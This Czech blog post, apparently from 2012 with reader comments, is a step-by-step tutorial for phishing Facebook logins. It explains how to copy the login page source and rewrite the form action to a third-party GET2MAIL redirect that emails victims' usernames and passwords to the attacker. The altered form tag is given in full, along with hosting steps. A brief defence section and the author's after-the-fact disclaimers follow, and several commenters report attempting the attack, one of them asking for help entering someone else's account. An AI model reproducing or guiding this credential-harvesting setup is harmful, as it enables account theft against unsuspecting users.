Další cizí slovo, který nejspíš většině z Vás nic neřekne. Phishing vychází z anglické slova fishing což znamená rybaření, myšleno v kontextu jako „návnada“ a počáteční písmeno f je nahrazeno ph, což má trošku hlubší význam, pokud Vás to zajímá mrkněte na wikipedia.cz. Abych to uzavřel, přeložil bych Phishing trošku nadnešeně jako – „návnady pro lamy“ 🙂 . Ajťáci pochopí, laická veřejnost asi bude dumat proč, jsem použil slovo lamy. Ale to by bylo na další vysvětlování.
Co to tedy přesně dělá a jak mi to pomůže hacknou někomu účet? Phishing je podvodná technika používaná na Internetu k získávání citlivých údajů, nejčastěji se jedná o zadání osobních údajů na falešnou stránku, která na první pohled není k rozeznání od skutečné stránky. V podstatě uživatel, takto věnuje své citlivá data aniž by měl ponětí, že právě naletěl podvodníkům.
Takže náš úkol bude vytvořit totožnou kopii Facebook úvodní příhlašovací stránky, kterou tak všichni dobře známe. Následovně zařídit, aby jsme obdrželi takto získané údaje na svůj email. První krok, přejděte na stránka facebook.com, klikněte pravým tlačítkem myši kamkoliv na stránku, z menu vyberte Zobrazit zdrojkový kód stránky ( Google Chrome ) , Zobrazit zdrojový kód ( IE 9 ) , Zobrazit zdrojový kód stránky ( Firefox ) . Použijte kombinaci kláves CTRL + A označit vše, CTRL + C kopírovat. Otevřete si nyní např. notepad nebo word a vložte CTRL + V . Nyní jděte na stránku soom.cz , proveďte registraci na stránkách a následovně z pravého menu vyberte GET2MAIL a klikněte na možnost Registrovat nové id . Vygeneruje se Vám ID, které zhruba bude vypadat nějak následovně 02184f4679 . Klikněte na něj a zaškrtněte možnost – Zasílat data e-mailem (vas@email.cz) Nyní se vraťte zpět ke zdrojovému kódu stránky a v kódu najděte spojení:
<form id=“POST“ action=“ https://www.facebook.com/login.php?login_attempt=1″ method=“post“ onsubmit=“return Event.__inlineSubmit(this,event)“>
a nahraďte
<form id=“POST“ action=“ http://www.soom.cz/projects/get2mail/redir.php?id= 02184f4679&url=https://www.facebook.com/login.php?login_attempt=1″ method=“post“ onsubmit=“return Event.__inlineSubmit(this,event)“>
za červený text dosaďte Vaše ID, které jste si vygenerovali na stránkách soom.cz. Nyní celý text opět označte CTRL + A a kopírujte CTRL + C . Otevřete si stránku pastehtml.com , nakopírujte změněný zdrojový kód Facebooku. Klikněte na modré tlačítko Publish page a opět vpravo nahoře na Publish page. Objeví se Vám stránka s linkem, tento link si zkopírujte a vložte do prohlížeče. Tadááá výsledek je na světě, mrkněte jak by zhruba měl vypadat >> SEM << . Nyní stačí jen, když Vám někdo na této stránce vyplní přihlášení na svůj profil a Vám tak automaticky přijdou tyto informace na email.
- Je to skutečně tak vážný?
Ano, jedná se o celkem vážný případ, kdy méně znalý uživatel může naletět na takto podvodně vytvořené stránky. Neboť i když se stránka nachází na jiné doméně, mnozí nepozorní uživatelé si toho nevšimnou a to nemluvím, že není větší problém, stránku nechat otevírat ve framu aniž by byla adresa stránky vůbec vidět ! Mimo to, uživatel zadá svoje přihlašovací údaje a následovně mu naskočí pravá facebook stránka! Uživatel se tak domnívá, že pouze špatně vyplnil heslo, neboť ho facebook vyžaduje znova ! Ve skutečnosti, však právě jeho heslo odešlo někomu do mejl boxu a on se poprvé skutečně hlásí do svého FB profilu.
- Jak se mám bránit?
Jediným řešením je neklikat na různé tlačítka líbí se mi, neklikat na odkazy odkazující na facebook z jiných stránek. Vždy se přihlašujte na svůj Facebook profil pouze přes doménu www.facebook.com ! Jakmile zpozorujete cokoliv jiného, rychle ze stránek vycouvejte! Kontrolujte adresu stránky ve Vašem prohlížeči, případně když najedete myší na jakýkoliv odkaz, většinou se v prohlížeči vlevo dole, při najetí na odkaz zobrazí skutečná adresa stránky, na kterou budete odkázáni.
Zpět na hlavní článek >> Jak hacknout facebook ?
Pokračovat na >> Keylogger , Kontrolní otázka, FaceNiff, Phishing, Hack s pomocí přátel
_________________________________________________________________________________
nemám v tom wordu““ tím pádem mi to nejde nahradit … takže co dělám špatně?
Prosím blíže specifikovat dotaz 😉
zdravim schvalne jsem to testoval na svejch emailech.Delal jsem vse podle navodu ale kdyz na tu fiktivni stranku napisu prihl.jmeno a heslo jednoho z mejch uctu tak mi to ukaze 403 Forbidden zde http://pastehtml.com/view/bubyw20lp.html co je spatne prosil bych o radu
vše jsem dělal podle příkazů ale když došlo na hledání toho kódu konkrtétně
tak jsem selhal ptže ten kód tam nikde není
konkrténě myslím ten kód hned po tom A nyní se vraťte ke zdrojovému kódu stránky a najděte v něm: ten kód
aha už ho mám…
Ahoj, tak sem si to taky chtel vyzkoušet a našel jsem akorát kod je to on, nebo jsem slepý?
Dobrý den,
Včera jsem se na vaše stránky dostal čirou náhodou. Jelikož uvažuji o koupi xboxu, chtěl jsem si něco zjistit o „hacknutí“ xboxu, místo toho mi ale vyskočila vaše stránka s nápisem „Jak hacknout Facebook.“ No zvědavost mi nedala a po přečtení mi spadla brada, jak je to jednoduché. O všech způsobech krom „phisingu“ sem věděl a tak sem si teda řekl, že si ho vyzkouším. Jak jinak se tomu člověk má bránit, než že se tomu trochu věnuje a vyzkouší si to 😀 Ale samotný kod
Jsem nikde nenašel. Nejbližší je mu
Je to on, nebo jenom špatně hledám. Totiž když tento kod nahradím, fiktivní stránka vypadá zcela normálně, ale po přihlášení se objeví chyba 403-FORBIDDEN.
zdravím potřeboval bych se někomu dostat na FB účet je to nutné tak kdyžtak pište na Email Hendy1@seznam.cz určitě se nějak dohodneme .-)
Čau vsechno mám jen mi nechodí ty mailu s heslama skusila jsem to na sve strance první ze svym fb to snad necemu vadí? =D
Omlouvám se, ale nebudu v tomto směru jakkoliv někomu pomáhat…. tento článek, opravdu slouží jen pouze k informování o nebezpečnosti tohoto typu průniku do FB účtu!!
Vse ok jen to pise chybu a nechodi na mail zadne data. Co s tim
Dobrý Den,
pokoušel jsem se vše udělat podle návodu ale vyskytla se chyba ve spojení které jsem měl nahradit ve zdrojovém kódu stránky….ve zdrojovém kódu stránky jsem nemohl najít dané spojení…..co s tím mám dělat???
Dobrý den,mám dotaz k Phishingu. Když vytvořím kopii Facebook přihlašovací stránky,tak ji ale musím vytvořit na PC toho sledovaného že?Děkuji za odpověd.
Dobrý den, tento postup je již poměrně staršího data… takže je možné, že již nemusí být popsaný způsob aktuální.. v každém případě nejsem schopný Vám v tomto poradit, článek poukazuje na slabé zabezpečení některých služeb nikoliv k nabádání trestné činnosti. Děkuji za pochopení.
Ne, není třeba to vytvářet na počítači sledovaného… je třeba to mít v síti internet. Zároveň bych rád podotkl, že se jedná o trestnou záležitost a tento článek neslouží k tomuto účelu, ale k účelu upozornění, na zranitelnost služeb a možných způsobů jak se jim bránit.
Dobry den, nikde nemohu najit to spojeni ktete se ma nahradit. Muzete mi prosim nekdo poradit? Diky
Příspěvek je z roku 2012, je velmi pravděpodobné, že již nemá aktuální vypovídající hodnotu. Zároveň bych rád podotkl, že se jedná o trestnou záležitost a tento článek neslouží k tomuto účelu, ale k účelu upozornění, na zranitelnost služeb a možných způsobů jak se jim bránit.